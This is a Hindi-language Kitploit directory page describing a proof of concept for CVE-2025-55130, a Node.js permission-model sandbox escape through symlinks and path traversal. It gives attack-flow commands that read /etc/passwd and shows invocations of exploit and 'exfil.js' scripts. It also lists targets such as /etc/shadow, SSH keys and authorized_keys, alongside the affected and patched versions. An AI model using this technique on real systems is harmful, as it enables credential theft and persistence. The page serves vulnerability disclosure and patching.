Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55130 — POC for CVE-2025-55130 | Kitploit
उपकरण/GitHubGitHub/scumfrog/cve-2025-55130
Privilege EscalationVulnerability AnalysisExploitationData ExfiltrationWeb SecurityContainer Escape
GitHubscumfrog/cve-2025-55130

CVE-2025-55130

POC for CVE-2025-55130

रिपॉजिटरी देखें
16 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55130 - Node.js अनुमति मॉडल सिमलिंक एस्केप

root@kitploit:~
   ___ _   _ ___     ____   ___ ____  ____      ____ ____ _ _____ ___  
  / __| | | | __|___/ _  \ / _ \___ \| ___|    | ___| ___/ |___ // _ \ 
 | (__| |_| | _|___| |_| || | | |__) |___ \ _____|__ \___ \ | |_ | | | |
  \___|\___/|___|   \__  ||_| |_|___/|_____|_____|__) |__) || |__) |_| |
                    |___/                       |____/____/|_|____/\___/ 
                                                                        
        Node.js अनुमति मॉडल बायपास क्राफ्टेड सिमलिंक के माध्यम से
                   [ खोजकर्ता: natann @ JFrog ]

अवलोकन

Node.js में एक पथ ट्रैवर्सल दोष है जो --allow-fs-read और --allow-fs-write अनुमति प्रतिबंधों से बाहर निकलने की अनुमति देता है, जिसमें सिमलिंक का उपयोग निरपेक्ष पथों की ओर इंगित करने और सापेक्ष ट्रैवर्सल के साथ संयोजन करने से होता है।

अनुमति जांच और पथ समाधान अलग-अलग होते हैं। एक बार प्रारंभिक पथ अनुमति जांच पास कर लेता है, तो सिमलिंक का अनुसरण किया जाता है और ट्रैवर्सल अनुक्रम सैंडबॉक्स से बाहर निकल जाते हैं।

प्रभावित संस्करण

शाखाकमजोर

तकनीकी विश्लेषण

मूल कारण

root@kitploit:~
अनुमति जांच:  ./nested/dirs/symlink/../../../etc/passwd
                   ^^^^^^^^^^^^^^^^^^ अनुमति (./ से शुरू होता है)
                   
पथ समाधान:   /actual/path/to/script/../../../etc/passwd
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 
                   हल होकर /etc/passwd पर जाता है - सैंडबॉक्स के बाहर

अनुमति मॉडल सिमलिंक समाधान से पहले पथ स्ट्रिंग को मान्य करता है। सिमलिंक को निरपेक्ष पथ पर बनाकर और सिमलिंक के बाद ../ ट्रैवर्सल का उपयोग करके, हम अनुमत निर्देशिका से बाहर निकल जाते हैं।

हमला प्रवाह

root@kitploit:~
1. mkdir -p ./a/b/c/d/e/f/g           # अनुमत पथ में नेस्टेड निर्देशिकाएँ बनाएँ
2. ln -s $(pwd) ./a/b/c/d/e/f/g/x     # सिमलिंक निरपेक्ष पथ पर
3. read ./a/b/c/d/e/f/g/x/../../../etc/passwd
         ^^^^^^^^^^^^^^^^^ 
         अनुमति जांच पास (अंदर ./)
   
   सिमलिंक समाधान के बाद:
   /home/user/project/../../../etc/passwd -> /etc/passwd
   ^^^^^^^^^^^^^^^^^^^^
   ट्रैवर्सल रूट से बाहर निकलता है

फ़ाइलें

फ़ाइलउद्देश्य
exploit.jsमुख्य एक्सप्लॉइट - मनमानी फ़ाइलें पढ़ें
exploit_write.jsमनमानी फ़ाइलें लिखें

उपयोग

root@kitploit:~
# बुनियादी शोषण
node --permission --allow-fs-read=. --allow-fs-write=. exploit.js

# जाँचें कि कमजोर है या नहीं
node check.js

# बड़े पैमाने पर एक्सफ़िल
node --permission --allow-fs-read=. --allow-fs-write=. exfil.js

प्रभाव

  • संवेदनशील फ़ाइलें पढ़ें: /etc/passwd, /etc/shadow, SSH कुंजियाँ, कॉन्फ़िग
  • मनमानी फ़ाइलें लिखें: क्रॉन जॉब, authorized_keys, कॉन्फ़िग
  • मल्टी-टेनेंट वातावरण में कंटेनर एस्केप
  • अविश्वसनीय कोड निष्पादन के लिए सैंडबॉक्स बायपास

संदर्भ

  • https://research.jfrog.com/vulnerabilities/nodejs-fs-permissions-bypass-cve-2025-55130/
  • https://nodejs.org/en/blog/vulnerability/december-2025-security-releases
  • https://nvd.nist.gov/vuln/detail/CVE-2025-55130

श्रेय

  • भेद्यता: नतान नेहोराई (natann) @ JFrog सुरक्षा अनुसंधान
  • सुधार: RafaelGSS @ Node.js

केवल अनुसंधान और अधिकृत परीक्षण के लिए।

टूल डाउनलोड करें
पैच किया गया
20.x< 20.20.020.20.0
22.x< 22.22.022.22.0
24.x< 24.13.024.13.0
25.x< 25.3.025.3.0
exfil.js
बड़े पैमाने पर फ़ाइल एक्सफ़िल्ट्रेशन
check.jsसंस्करण भेद्यता जाँच